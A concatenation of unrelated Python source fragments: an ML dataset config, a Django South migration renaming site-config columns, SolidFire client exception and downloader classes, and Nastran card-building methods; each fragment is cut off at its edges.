'positive_label': None,
'plots': ['best_estimator_vs_parameters', 'learning_curve'],
'best_estimator': sklearn.tree.DecisionTreeRegressor(criterion='poisson', max_depth=100, random_state=0,
splitter='best', min_impurity_decrease=0.0)
},
'compressive_strength': {
'filenames': ['Concrete_Data.xls'],
'header': None,
'delimiter': ',',
'y': ['Concrete compressive strength(MPa, megapascals) '],
'skip_columns': [],
'skip_rows': [0],
'train_size': 0.75,
'stratify': False,
'split_random_state': 0,
'included_test_train': False,
'estimator_scoring': [mean_absolute_error, explained_variance_score, r2_score, mean_squared_error],
'learning_curve_scoring': [[mean_squared_error]],
| |
<gh_stars>10-100
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
db.rename_column(u'public_project_siteconfig', 'desc_about', 'about_text')
db.rename_column(u'public_project_siteconfig', 'footer_html', 'footer')
db.rename_column(u'public_project_siteconfig', 'contact_html', 'contact_text')
def backwards(self, orm):
db.rename_column(u'public_project_siteconfig', 'about_text', 'desc_about')
db.rename_column(u'public_project_siteconfig', 'footer', 'footer_html')
db.rename_column(u'public_project_siteconfig', 'contact_text', 'contact_html')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'public_project.activitylog': {
'Meta': {'ordering': "['-date']", 'object_name': 'ActivityLog'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
u'public_project.comment': {
'Meta': {'ordering': "['-date_added']", 'object_name': 'Comment'},
'activation_hash': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'comment': ('django.db.models.fields.TextField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '250'}),
'feedback_allowed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'published_by': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.commentrelation': {
'Meta': {'object_name': 'CommentRelation'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.Comment']"}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'page': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
u'public_project.document': {
'Meta': {'ordering': "['-date_added']", 'object_name': 'Document'},
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'document': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
'events': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_documents'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Event']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_documents'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Participant']"}),
'pdf_images_generated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'project_parts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_documents'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.ProjectPart']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.event': {
'Meta': {'ordering': "['-date']", 'object_name': 'Event'},
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'event_type': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'important': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_events'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Participant']"}),
'project_parts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_events'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.ProjectPart']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.image': {
'Meta': {'ordering': "['title']", 'object_name': 'Image'},
'attribution': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'attribution_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.membership': {
'Meta': {'object_name': 'Membership'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'from_participant': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'from_memberships'", 'to': u"orm['public_project.Participant']"}),
'function': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'to_participant': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'to_memberships'", 'to': u"orm['public_project.Participant']"})
},
u'public_project.page': {
'Meta': {'ordering': "['number']", 'object_name': 'Page'},
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'document': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.Document']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'number': ('django.db.models.fields.IntegerField', [], {})
},
u'public_project.participant': {
'Meta': {'ordering': "['order', 'name']", 'object_name': 'Participant'},
'belongs_to': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['public_project.Participant']", 'through': u"orm['public_project.Membership']", 'symmetrical': 'False'}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '250'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '500', 'null': 'True', 'blank': 'True'})
},
u'public_project.projectgoal': {
'Meta': {'ordering': "['order']", 'object_name': 'ProjectGoal'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '100', 'null': 'True', 'blank': 'True'}),
'performance_figure': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'project_goal_group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.ProjectGoalGroup']"})
},
u'public_project.projectgoalgroup': {
'Meta': {'object_name': 'ProjectGoalGroup'},
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'event': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.Event']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_current': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'project_part': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.ProjectPart']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.projectpart': {
'Meta': {'ordering': "['order', 'name']", 'object_name': 'ProjectPart'},
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'main_project_parts': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['public_project.ProjectPart']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '500', 'null': 'True', 'blank': 'True'})
},
u'public_project.question': {
'Meta': {'ordering': "['title']", 'object_name': 'Question'},
'answer': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'answered': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'documents': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_documents'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Document']"}),
'events': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_questions'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Event']"}),
'explanations': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_questions'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Participant']"}),
'project_parts': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_questions'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.ProjectPart']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.researchrequest': {
'Meta': {'ordering': "['-date_added']", 'object_name': 'ResearchRequest'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nr': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'open': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'public_project.researchrequestrelation': {
'Meta': {'object_name': 'ResearchRequestRelation'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'page': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'research_request': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.ResearchRequest']"})
},
u'public_project.searchtag': {
'Meta': {'ordering': "['order']", 'object_name': 'SearchTag'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '100', 'null': 'True', 'blank': 'True'})
},
u'public_project.searchtagcacheentry': {
'Meta': {'ordering': "['-num_results']", 'object_name': 'SearchTagCacheEntry'},
'document': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.Document']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'num_results': ('django.db.models.fields.IntegerField', [], {}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.SearchTag']"})
},
u'public_project.sitecategory': {
'Meta': {'object_name': 'SiteCategory'},
'category': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'documents': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'related_site_categories'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['public_project.Document']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intro_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
u'public_project.siteconfig': {
'Meta': {'object_name': 'SiteConfig'},
'about_text': ('django.db.models.fields.TextField', [], {'default': "u'About text'"}),
'comments': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'contact_text': ('django.db.models.fields.TextField', [], {'default': "u'This text will be shown on the contact page.'"}),
'footer': ('django.db.models.fields.TextField', [], {'default': "u'This text will be shown in the footer of the site.'"}),
'header_image': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['public_project.Image']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intro_text': ('django.db.models.fields.TextField', [], {'default': "u'This is a project watch website.'"}),
'navi_link_color': ('django.db.models.fields.CharField', [], {'default': "'#FFFFFF'", 'max_length': '7'}),
'short_title': ('django.db.models.fields.CharField', [], {'default': "u'ProjectWatch'", 'max_length': '250'}),
'sub_title': ('django.db.models.fields.CharField', [], {'default': "u'Project Website Subtitle'", 'max_length': '250'}),
'sub_title_color': ('django.db.models.fields.CharField', [], {'default': "'#444444'", 'max_length': '7'}),
'title': ('django.db.models.fields.CharField', [], {'default': "u'ProjectWatch'", 'max_length': '250'}),
'title_color': ('django.db.models.fields.CharField', [], {'default': "'#990000'", 'max_length': '7'})
},
u'public_project.userprofile': {
'Meta': {'object_name': 'UserProfile'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'receive_new_comment_emails': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.User']", 'unique': 'True'})
},
u'public_project.websource': {
'Meta': {'ordering': "['order']", 'object_name': 'WebSource'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
| |
<reponame>cseelye/sfauto<filename>libsf/__init__.py<gh_stars>0
#!/usr/bin/env python
"""This module provides classes for connecting to SolidFire nodes/clusters via SSH and HTTP endpoints"""
#pylint: disable=unidiomatic-typecheck,protected-access,global-statement
from __future__ import print_function, absolute_import
# Suppress warnings in python2 to hide deprecation messages in imports
import sys
if sys.version[0] == '2':
import warnings
warnings.filterwarnings('ignore')
import base64
import six.moves.BaseHTTPServer
import copy
import six.moves.http_client
import inspect
from io import open
import json
import os
import paramiko
import random
import socket
import ssl
import time
import six.moves.urllib.parse
import six.moves.urllib.error
# For some reason pylint 1.9 in python2.7 chokes on this import line
import six.moves.urllib.request #pylint: disable=import-error
from .logutil import GetLogger
from . import sfdefaults
class SolidFireError(Exception):
"""Base class for SolidFire exceptions"""
def __init__(self, message, originalTraceback=None, innerException=None):
super(SolidFireError, self).__init__(message)
self.originalTraceback = originalTraceback
self.innerException = innerException
def IsRetryable(self):
return False
def ToDict(self):
"""Convert this exception to a dictionary"""
return {k:copy.deepcopy(v) for k,v in vars(self).items() if not k.startswith('_')}
def ToJSON(self):
"""Convert this exception to a JSON string"""
return json.dumps(self.ToDict())
class InvalidArgumentError(SolidFireError):
"""Exception raised when invalid arguments are passed to a function or invalid type conversion is attempted"""
class UnknownObjectError(SolidFireError):
"""Exception raised when the specified object being searched for/operated on cannot be found"""
class UnknownNodeError(UnknownObjectError):
"""Exception raised when making a per-node API call to a non-existent nodeID"""
class SFTimeoutError(SolidFireError):
"""Exception raised when a timeout expires"""
class SolidFireAPIError(SolidFireError):
"""Exception raised when an error is returned from a SolidFire API call"""
def __init__(self, method, params, ip, endpoint, name, code, message):
"""
Initialize this exception with API call context
Args:
method: the SolidFire API method name (e.g. GetClusterInfo)
params: the SolidFire API method params (e.g. {"arg1" : "value"} )
ip: the IP address of the SolidFire endpoint (cluster MVIP or node MIP)
endpoint: the full SolidFire endpoint URL (e.g. https://ip:443/json-rpc/version)
name: the SolidFire exception name
code: the SolidFire error code
message: the SolidFire error message
"""
super(SolidFireAPIError, self).__init__(message)
self.args = (method, params, ip, endpoint, name, code, message) # important to set args so this object is picklable
self.method = method
self.params = params
self.ip = ip
self.endpoint = endpoint
self.name = name
self.message = message.strip()
self.code = code
def __str__(self):
return "{} server=[{}] method=[{}], params=[{}] - error name=[{}], message=[{}], code=[{}]".format(self.__class__.__name__, self.ip, self.method, self.params, self.name, self.message, self.code)
def IsRetryable(self):
return self.name in [
'xDBConnectionLoss',
'xDBOperationTimeout',
'xDBSessionExpired',
'xDBSessionMoved',
'xDBNoServerResponse',
'xDBClosing',
'xDBInvalidState'
]
def IsUnknownAPIError(self):
return self.name in [
'xUnknownAPIMethod',
'xUnknownAPIVersion',
'xUnknownRPCMethod'
]
class SFConnectionError(SolidFireError):
"""Exception raised when there is a network/connection issue communicating with the SolidFire endpoint"""
def __init__(self, ip, endpoint, innerException, method=None, params=None, message=None, code=None):
"""
Initialize this exception with another exception and context
Arguments:
ip: the IP address of the SolidFire endpoint (cluster MVIP or node MIP)
endpoint: the full SolidFire endpoint URL (e.g. https://ip:443/json-rpc/version)
innerException: the original exception that was thrown
method: the SolidFire API method name (e.g. GetClusterInfo)
params: the SolidFire API method params (e.g. {"arg1" : "value"} )
message: the exception message. This is used to override the default behavior of filling in the
message automatically based on innerException
code: the error code. This is used to override the default behavior of filling in the
code automatically based on innerException
"""
super(SFConnectionError, self).__init__(message, innerException=innerException)
self.args = (ip, endpoint, innerException, method, params, message, code)
self.method = method
self.params = params
self.ip = ip
self.endpoint = endpoint
self.message = message
self.code = code
self.retryable = False
# If the caller did not specify a message, parse out the message, code, and retry-ability from the exception
if not self.message and self.innerException:
# If this exception is actually a wrapper around another exception, get the inner
# Mostly URLError wrapping an OSError, socket.error or ssl.SSLError
innerReason = getattr(self.innerException, "reason", None)
if innerReason and isinstance(innerReason, Exception):
self.innerException = innerReason
if type(self.innerException) == six.moves.urllib.error.HTTPError:
if self.innerException.code in six.moves.BaseHTTPServer.BaseHTTPRequestHandler.responses:
self.message = 'HTTP Error {}: {}'.format(self.innerException.code, six.moves.BaseHTTPServer.BaseHTTPRequestHandler.responses[self.innerException.code])
self.code = self.innerException.code
else:
self.message = 'HTTP Error {}: {}'.format(self.innerException.code, self.innerException.reason)
self.code = self.innerException.code
# 401 - unauthorized
# 404 - not found
if self.code not in [401, 404]:
self.retryable = True
elif type(self.innerException) == six.moves.urllib.error.URLError:
self.message = '{}'.format(self.innerException.reason)
self.retryable = True
elif type(self.innerException) == socket.timeout:
self.message = 'Socket error 110: connection timed out'
self.code = 110
self.retryable = True
elif type(self.innerException) in [socket.herror, socket.gaierror]:
self.message = 'Socket error {}: {}'.format(self.innerException.args[0], self.innerException.args[1])
self.code = self.innerException.args[0]
# 54 - connection reset by peer
# 61 - connection refused (transient on restarts)
# 104 - connection reset by peer
# 110 - connection timed out
# 111 - connection refused (transient on restarts)
# 113 - no route to host (transient when node is rebooted)
if self.code in (54, 60, 61, 104, 110, 111, 113):
self.retryable = True
elif type(self.innerException) == OSError:
self.message = 'OSError {}: {}'.format(self.innerException.errno, self.innerException.strerror)
self.code = self.innerException.errno
elif type(self.innerException) == IOError:
self.message = 'IOError {}: {}'.format(self.innerException.errno, self.innerException.strerror)
self.code = self.innerException.errno
elif type(self.innerException) == six.moves.http_client.BadStatusLine:
self.message = 'Bad HTTP status'
self.retryable = True
elif type(self.innerException) == ValueError:
self.message = 'Received invalid JSON'
self.retryable = True
elif isinstance(self.innerException, ssl.SSLError):
# https://docs.python.org/2.7/library/ssl.html#functions-constants-and-exceptions
self.message = self.innerException.message
self.retryable = True
if isinstance(self.innerException, ssl.CertificateError):
self.retryable = False
else:
import pprint
print("Unknown inner exception - {}".format(pprint.pformat(self.innerException)))
self.message = str(self.innerException)
self.retryable = False
def __str__(self):
# API calls:
# ExceptionName server=[{}] method=[{}], params=[{}] - error message=[{}], code=[{}]
# HTTP downloads:
# ExceptionName endpoint=[{}] - error name=[{}], message=[{}], code=[{}]
if self.method and self.params:
output = '{} server=[{}] method=[{}] params=[{}] - error message=[{}]'.format(self.__class__.__name__, self.ip, self.method, self.params, self.message)
else:
output = '{} endpoint=[{}] - error message=[{}]'.format(self.__class__.__name__, self.endpoint, self.message)
if self.code != None:
output += ', code=[{}]'.format(self.code)
return output
def IsRetryable(self):
return self.retryable
class UnauthorizedError(SolidFireError):
"""Exception raised when an unauthorized response is returned from an SSH or HTTP SolidFire endpoint"""
@classmethod
def APIContext(cls, method, params, ip, endpoint):
"""
Create this exception with API call context
Arg:
method: the SolidFire API method name (e.g. GetClusterInfo)
params: the SolidFire API method params (e.g. {"arg1" : "value"} )
ip: the IP address of the SolidFire endpoint (cluster MVIP or node MIP)
endpoint: the full SolidFire endpoint URL (e.g. https://ip:443/json-rpc/version)
"""
ex = cls("UnauthorizedError server=[{}] method=[{}], params=[{}] - error name=[{}], message=[{}], code=[{}]".format(ip, method, params, "xUnauthorized", "invalid credentials", 401))
#pylint: disable=attribute-defined-outside-init
ex.method = method
ex.params = params
ex.ip = ip
ex.endpoint = endpoint
ex.name = "xUnauthorized"
ex.code = 401
#pylint: enable=attribute-defined-outside-init
return ex
@classmethod
def IPContext(cls, ip):
"""
Create this exception with an IP endpoint
Args:
ip: the IP address/endpoint
"""
ex = cls("Invalid credentials for {}".format(ip))
#pylint: disable=attribute-defined-outside-init
ex.method = None
ex.params = None
ex.ip = ip
ex.endpoint = ip
ex.name = "xUnauthorized"
ex.code = 401
#pylint: enable=attribute-defined-outside-init
return ex
def IsRetryable(self):
return False
class LocalEnvironmentError(SolidFireError):
"""Exception raised when something goes wrong on the local system, outside of python.
This is basically a wrapper for python's EnvironmentError that is rooted in the SF exception hierarchy"""
def __init__(self, innerException):
"""
Initialize this exception with an existing exception
Arguments:
innerException: the exception to wrap. It must be an exception from the EnvironmentError hierarchy (IOError, OSError)
"""
# Make sure the input at least looks like an EnvironmentError
assert(hasattr(innerException, 'errno'))
assert(hasattr(innerException, 'strerror'))
self.args = (innerException)
if innerException.strerror:
self.message = innerException.strerror.strip()
else:
self.message = str(innerException).strip()
super(LocalEnvironmentError, self).__init__(self.message)
self.innerException = innerException
self.errno = innerException.errno
def __str__(self):
return self.message
def IsRetryable(self):
return False
class ClientError(SolidFireError):
"""Base for all client exceptions"""
class ClientCommandError(ClientError):
"""Exception raised when command fails on a client"""
class ClientAuthorizationError(ClientError):
"""Exception raised when an unauthorized response is returned from a client"""
class ClientRefusedError(ClientError):
"""Exception raised when a connection is refused to a client"""
class ClientConnectionError(ClientError):
"""Exception raised when there is a problem connecting to a client"""
class HTTPDownloader(object):
"""
Download content from a URL
"""
def __init__(self, server, port=443, username=None, password=None):
"""
Args:
server: the IP address or resolvable hostname of the server to download from
port: the port to use
username: the name of an authorized user
password: <PASSWORD>
"""
self.server = server
self.port = port
self.username = username
self.password = password
self.log = GetLogger()
def Download(self, remotePath, useAuth=True, useSSL=True, timeout=300):
"""
Download a URL (GET) and return the content. For large binary files, see StreamingDownload
Args:
remotePath: the path component of the URL
useAuth: use Basic Auth when connecting
useSSL: Use SSL when connecting
timeout: | |
for all DVAR.
LABEL : str
Label used to describe variable in output.
DELTAB : float; default=0.02
The change in the dimensionless design variable B to be used in the
calculation of the design sensitivity coefficients.
VIDi : List[int]
Identification number of DVSET entry.
"""
fields = ['DVAR', bid, label, deltab] + vids
self.reject_card_lines('DVAR', print_card_(fields).split('\n'), show_log=False)
def add_extrn(self, nids: List[int], comps: List[str]):
fields = ['EXTRN']
for nid, comp in zip(nids, comps):
fields.extend([nid, comp])
self.reject_card_lines('EXTRN', print_card_(fields).split('\n'), show_log=False)
def add_panel(self, names: List[str], set_ids: List[int]) -> None:
fields = ['PANEL']
for name, set_id in zip(names, set_ids):
fields.extend([name, set_id])
self.reject_card_lines('PANEL', print_card_8(fields).split('\n'), show_log=False)
def add_cmfree(self, eid, s, s2, y, n) -> None:
fields = ['CMFREE', eid, s, s2, y, n]
self.reject_card_lines('CMFREE', print_card_8(fields).split('\n'), show_log=False)
def add_cfluid2(self, eid, ringfls, rho, b, harmonic) -> None:
fields = ['CFLUID2', eid] + ringfls + [rho, b, harmonic]
self.reject_card_lines('CFLUID2', print_card_8(fields).split('\n'), show_log=False)
def add_cfluid3(self, eid, ringfls, rho, b, harmonic) -> None:
fields = ['CFLUID3', eid] + ringfls + [rho, b, harmonic]
self.reject_card_lines('CFLUID3', print_card_8(fields).split('\n'), show_log=False)
def add_cfluid4(self, eid, ringfls, rho, b, harmonic) -> None:
fields = ['CFLUID4', eid] + ringfls + [rho, b, harmonic]
self.reject_card_lines('CFLUID4', print_card_8(fields).split('\n'), show_log=False)
def add_rgyro(self, sid, asynci, refrot, unit, speed_low, speed_high, speed,
comment='') -> None:
"""Creates an RGYRO card"""
fields = ['RGYRO', sid, asynci, refrot, unit, speed_low, speed_high, speed]
self.reject_card_lines('RGYRO', print_card_8(fields).split('\n'), show_log=False)
def add_rspint(self, rid, grida, gridb, gr, unit, table_id, comment='') -> None:
"""Creates an RSPINT card"""
fields = ['RSPINT', rid, grida, gridb, gr, unit, table_id]
self.reject_card_lines('RSPINT', print_card_8(fields).split('\n'), show_log=False)
def add_temp(self, sid, temperatures, comment='') -> TEMP:
"""
Creates a TEMP card
Parameters
----------
sid : int
Load set identification number
temperatures : dict[nid] : temperature
nid : int
node id
temperature : float
the nodal temperature
comment : str; default=''
a comment for the card
"""
temp = TEMP(sid, temperatures, comment=comment)
self._add_thermal_load_object(temp)
return temp
#def add_tempp1(self) -> TEMPP1:
#temp = TEMPP1()
#self._add_thermal_load_object(temp)
#return temp
def add_tempd(self, sid, temperature, comment='') -> TEMPD:
"""
Creates a TEMPD card
Parameters
----------
sid : int
Load set identification number. (Integer > 0)
temperature : float
default temperature
comment : str; default=''
a comment for the card
"""
tempd = TEMPD(sid, temperature, comment=comment)
self._add_tempd_object(tempd)
return tempd
